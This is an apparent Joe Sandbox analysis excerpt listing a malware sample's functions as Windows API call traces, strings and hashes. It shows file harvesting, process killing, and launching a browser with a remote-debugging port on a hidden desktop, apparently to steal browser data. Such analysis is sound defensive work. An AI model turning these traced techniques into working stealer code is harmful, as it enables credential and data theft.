                        • Instruction ID: c6346bbfb879aee06bb49304e3e0f7f1865c1abf8534df6a0b53b7e52a47dc3a
                        • Opcode Fuzzy Hash: 3906c972e2ecf23050b31b6d952fbd3ea5cf6ee4d99a827bc61d3adcaf9e716c
                        • Instruction Fuzzy Hash: 01128270B1160AAFCB25EF78D989AEE77B8AF84300F144528F956E7290DF34DC458B90
                        Function 0091CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0091CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091CC13
                        • lstrcat.KERNEL32(?,?), ref: 0091CC5F
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091CC71
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091CC8B
                        • wsprintfA.USER32 ref: 0091CCB0
                        • PathMatchSpecA.SHLWAPI(?,015E8A28), ref: 0091CCE2
                        • CoInitialize.OLE32(00000000), ref: 0091CCEE
                          • Part of subcall function 0091CAE0: CoCreateInstance.COMBASE(0092B110,00000000,00000001,0092B100,?), ref: 0091CB06
                          • Part of subcall function 0091CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0091CB46
                          • Part of subcall function 0091CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0091CBC9
                        • CoUninitialize.COMBASE ref: 0091CD09
                        • lstrcat.KERNEL32(?,?), ref: 0091CD2E
                        • lstrlen.KERNEL32(?), ref: 0091CD3B
                        • StrCmpCA.SHLWAPI(?,0092CFEC), ref: 0091CD55
                        • wsprintfA.USER32 ref: 0091CD7D
                        • wsprintfA.USER32 ref: 0091CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0091CDB0
                        • wsprintfA.USER32 ref: 0091CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0091CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0091CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0091CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0091CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0091CF8D
                        • FindClose.KERNEL32(?), ref: 0091CF9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: 4eb781369559a84deac76c87d7ab54850cde8783268a6e968508b1d081960f7e
                        • Instruction ID: 2304e9a2159c3a1035362240e28e882c0077e0cb54d3c45b77bf91c29a1b0efe
                        • Opcode Fuzzy Hash: 4eb781369559a84deac76c87d7ab54850cde8783268a6e968508b1d081960f7e
                        • Instruction Fuzzy Hash: 0CC162B1A00219AFDB64DF64DC49BEE7779BF84300F144599F50AA7290DE30AE85CF91
                        Function 00911269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00911291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009112BF
                        • lstrlen.KERNEL32(00934CA8), ref: 009112CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112E7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 009112F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0091133A
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091135C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911376
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009113AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009113D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009113E2
                        • lstrlen.KERNEL32(00931794), ref: 009113ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091140A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911416
                        • lstrlen.KERNEL32(?), ref: 00911423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911443
                        • lstrcat.KERNEL32(00000000,?), ref: 00911451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091147A
                        • StrCmpCA.SHLWAPI(?,015EE1D0), ref: 009114A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009114E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911535
                        • StrCmpCA.SHLWAPI(?,015EF130), ref: 00911552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911593
                        • lstrcpy.KERNEL32(00000000,?), ref: 009115BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009115E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009117BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 009117F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091181C
                        • FindClose.KERNEL32(00000000), ref: 0091182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: e7d12db2faf3846d0a62054f453ea5f030b4dad143b6291e3dc7ec32c7982767
                        • Instruction ID: 246c47af742cd95d2bc4aaa8e16555690764da6916ea210a30b63c35d03d8629
                        • Opcode Fuzzy Hash: e7d12db2faf3846d0a62054f453ea5f030b4dad143b6291e3dc7ec32c7982767
                        • Instruction Fuzzy Hash: 55C17E31B1160AAFCB21EF78DD89AEE77B8AF84700F144428B956A7291DF34DC458B90
                        Function 00909770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 00909790
                        • lstrcat.KERNEL32(?,?), ref: 009097A0
                        • lstrcat.KERNEL32(?,?), ref: 009097B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 009097C3
                        • memset.MSVCRT ref: 009097D7
                          • Part of subcall function 00923E70: lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00923EA5
                          • Part of subcall function 00923E70: lstrcpy.KERNEL32(00000000,015EF288), ref: 00923ECF
                          • Part of subcall function 00923E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0090134E,?,0000001A), ref: 00923ED9
                        • wsprintfA.USER32 ref: 00909806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00909827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00909844
                          • Part of subcall function 009246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009246B9
                          • Part of subcall function 009246A0: Process32First.KERNEL32(00000000,00000128), ref: 009246C9
                          • Part of subcall function 009246A0: Process32Next.KERNEL32(00000000,00000128), ref: 009246DB
                          • Part of subcall function 009246A0: StrCmpCA.SHLWAPI(?,?), ref: 009246ED
                          • Part of subcall function 009246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00924702
                          • Part of subcall function 009246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00924711
                          • Part of subcall function 009246A0: CloseHandle.KERNEL32(00000000), ref: 00924718
                          • Part of subcall function 009246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00924726
                          • Part of subcall function 009246A0: CloseHandle.KERNEL32(00000000), ref: 00924731
                        • lstrcat.KERNEL32(00000000,?), ref: 00909878
                        • lstrcat.KERNEL32(00000000,?), ref: 00909889
                        • lstrcat.KERNEL32(00000000,00934B60), ref: 0090989B
                        • memset.MSVCRT ref: 009098AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009098D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00909903
                        • StrStrA.SHLWAPI(00000000,015F00C0), ref: 00909919
                        • lstrcpyn.KERNEL32(00B393D0,00000000,00000000), ref: 00909938
                        • lstrlen.KERNEL32(?), ref: 0090994B
                        • wsprintfA.USER32 ref: 0090995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 00909971
                        • Sleep.KERNEL32(00001388), ref: 009099E7
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009092E1
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009092FA
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 00909399
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009093E6
                          • Part of subcall function 00924740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00924759
                          • Part of subcall function 00924740: Process32First.KERNEL32(00000000,00000128), ref: 00924769
                          • Part of subcall function 00924740: Process32Next.KERNEL32(00000000,00000128), ref: 0092477B
                          • Part of subcall function 00924740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092479C
                          • Part of subcall function 00924740: TerminateProcess.KERNEL32(00000000,00000000), ref: 009247AB
                          • Part of subcall function 00924740: CloseHandle.KERNEL32(00000000), ref: 009247B2
                          • Part of subcall function 00924740: Process32Next.KERNEL32(00000000,00000128), ref: 009247C0
                          • Part of subcall function 00924740: CloseHandle.KERNEL32(00000000), ref: 009247CB
                        • CloseDesktop.USER32(?), ref: 00909A1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 958055206-1862457068
                        • Opcode ID: eba704ae997482bb3ffacbdab5baf3ac9df6e76c584b95fe1c07cefc82b9aa0d
                        • Instruction ID: f2a083167af5fa1b54d1c14b20daaaefcb3f3c56544d1c56ed5d50e0741a490c
                        • Opcode Fuzzy Hash: eba704ae997482bb3ffacbdab5baf3ac9df6e76c584b95fe1c07cefc82b9aa0d
                        • Instruction Fuzzy Hash: C6914471A50218AFDB14DFA4DC89FDE77B9AF88700F204595F609A71D1DF70AA448FA0
                        Function 0091E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0091E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091E243
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091E263
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091E27D
                        • wsprintfA.USER32 ref: 0091E2A2
                        • StrCmpCA.SHLWAPI(?,0092CFEC), ref: 0091E2B4
                        • wsprintfA.USER32 ref: 0091E2D1
                          • Part of subcall function 0091EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0091EE12
                        • wsprintfA.USER32 ref: 0091E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0091E304
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091E335
                        • lstrcat.KERNEL32(?,00931794), ref: 0091E347
                        • lstrcat.KERNEL32(?,?), ref: 0091E358
                        • lstrcat.KERNEL32(?,00931794), ref: 0091E36A
                        • lstrcat.KERNEL32(?,?), ref: 0091E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E422
                        • DeleteFileA.KERNEL32(?), ref: 0091E45C
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091E49B
                        • FindClose.KERNEL32(00000000), ref: 0091E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 77dbc91e4b31352563a70258d19f229defb2e299a8d2a99ef53fccfa3de4a2fe
                        • Instruction ID: 189770034179480d8754832c1616d7ee3fe51a317509a85c50933cc302dcf3c1
                        • Opcode Fuzzy Hash: 77dbc91e4b31352563a70258d19f229defb2e299a8d2a99ef53fccfa3de4a2fe
                        • Instruction Fuzzy Hash: 72818371A0021CAFCB24EF74DD49AEE7779BF84300F144998B91A97191DF74AA88CF90
                        Function 009016B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009016E2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090176C
                        • lstrcat.KERNEL32(00000000), ref: 00901776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 009018F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009018FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 50a1d7a2b2b0debd8dce3187e9374e29ad24cb4654e3f4a27f7b4ff9b723d787
                        • Instruction ID: fc1cfd212210eca23e9405e33da0aae5ccb19006a8b2c85b5517b699ba6d179e
                        • Opcode Fuzzy Hash: 50a1d7a2b2b0debd8dce3187e9374e29ad24cb4654e3f4a27f7b4ff9b723d787
                        • Instruction Fuzzy Hash: 68819531A1061A9FCB22EF68EE89BAE77B9AF84700F140124F815A72D1DF30DD45CB91
                        Function 0091DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0091DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091DD4C
                        • wsprintfA.USER32 ref: 0091DD62
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091DD79
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091DD9C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091DDB6
                        • wsprintfA.USER32 ref: 0091DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0091DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091DDED
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                          • Part of subcall function 0091D980: memset.MSVCRT ref: 0091D9A1
                          • Part of subcall function 0091D980: memset.MSVCRT ref: 0091D9B3
                          • Part of subcall function 0091D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091D9DB
                          • Part of subcall function 0091D980: lstrcpy.KERNEL32(00000000,?), ref: 0091DA0E
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,00000000), ref: 0091DA1C
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,015EFFD0), ref: 0091DA36
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,?), ref: 0091DA4A
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,015EE290), ref: 0091DA5E
                          • Part of subcall function 0091D980: lstrcpy.KERNEL32(00000000,?), ref: 0091DA8E
                          • Part of subcall function 0091D980: GetFileAttributesA.KERNEL32(00000000), ref: 0091DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091DE2E
                        • FindClose.KERNEL32(00000000), ref: 0091DE3D
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091DE66
                        • lstrcat.KERNEL32(?,015EEF10), ref: 0091DE7A
                        • lstrlen.KERNEL32(?), ref: 0091DE84
                        • lstrlen.KERNEL32(?), ref: 0091DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: 755d7a324e9df28f8bce5f76509cb3ba1641ac0a609e5f8f82ddd6e16af646f2
                        • Instruction ID: cb419270df10a75799c44d2fe104afb9f22c7ebf69170cb32052ab9fb8fc20fe
                        • Opcode Fuzzy Hash: 755d7a324e9df28f8bce5f76509cb3ba1641ac0a609e5f8f82ddd6e16af646f2
                        • Instruction Fuzzy Hash: 98615071A10208AFCB24EF74DD89AEE77B9BF88300F1045A8B50A97291DF34AB44CF51
